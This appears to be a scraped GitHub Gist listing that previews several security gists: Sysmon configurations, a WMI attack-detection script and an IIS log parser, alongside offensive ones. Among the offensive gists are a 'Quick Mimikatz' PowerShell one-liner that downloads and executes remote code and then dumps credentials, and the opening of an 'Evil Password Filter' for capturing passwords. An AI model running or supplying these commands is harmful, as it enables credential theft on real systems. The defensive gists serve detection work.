gfoss / Quick-Mimikatz
Last active Feb 12, 2020
Quick Mimikatz
View Quick-Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString(""); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
Neo23x0 / config-server.xml
Last active Nov 7, 2019
Sysmon Base Configuration - Windows Server
View config-server.xml
This is a Microsoft Sysmon configuration to be used on Windows server systems
v0.2.1 December 2016
Florian Roth
The focus of this configuration is
- hacking activity on servers / lateral movement (bad admin, attacker)
It is not focussed on
- malware detection (execution)
- malware detection (network connections)
Neo23x0 / config-client.xml
Last active Oct 22, 2019
Sysmon Base Configuration - Workstations
View config-client.xml
This is a Microsoft Sysmon configuration to be used on Windows workstations
v0.2.1 December 2016
Florian Roth (with the help and ideas of others)
The focus of this configuration is
- malware detection (execution)
- malware detection (network connections)
- exploit detection
It is not focussed on
mattifestation / WMI_attack_detection.ps1
Last active Sep 16, 2019
BlueHat 2016 - WMI attack detection demo
View WMI_attack_detection.ps1
#region Scriptblocks that will execute upon alert trigger
$LateralMovementDetected = {
$Event = $EventArgs.NewEvent
$EventTime = [DateTime]::FromFileTime($Event.TIME_CREATED)
$MethodName = $Event.MethodName
$Namespace = $Event.Namespace
$Object = $Event.ObjectPath
$User = $Event.User
mubix / evilpassfilter.cpp
Created Sep 10, 2013
Evil "Password Filter"
View evilpassfilter.cpp
#include <windows.h>
#include <stdio.h>
#include <WinInet.h>
#include <ntsecapi.h>
void writeToLog(const char* szString)
FILE* pFile = fopen("c:\\windows\\temp\\logFile.txt", "a+");
if (NULL == pFile)
jstangroome / ConvertFrom-IISW3CLog.ps1
Created Aug 8, 2013
Function to convert lines in an IIS W3C log file to PowerShell objects
View ConvertFrom-IISW3CLog.ps1
function ConvertFrom-IISW3CLog {
param (
[Parameter(Mandatory, ValueFromPipeline, ValueFromPipelineByPropertyName)]
process {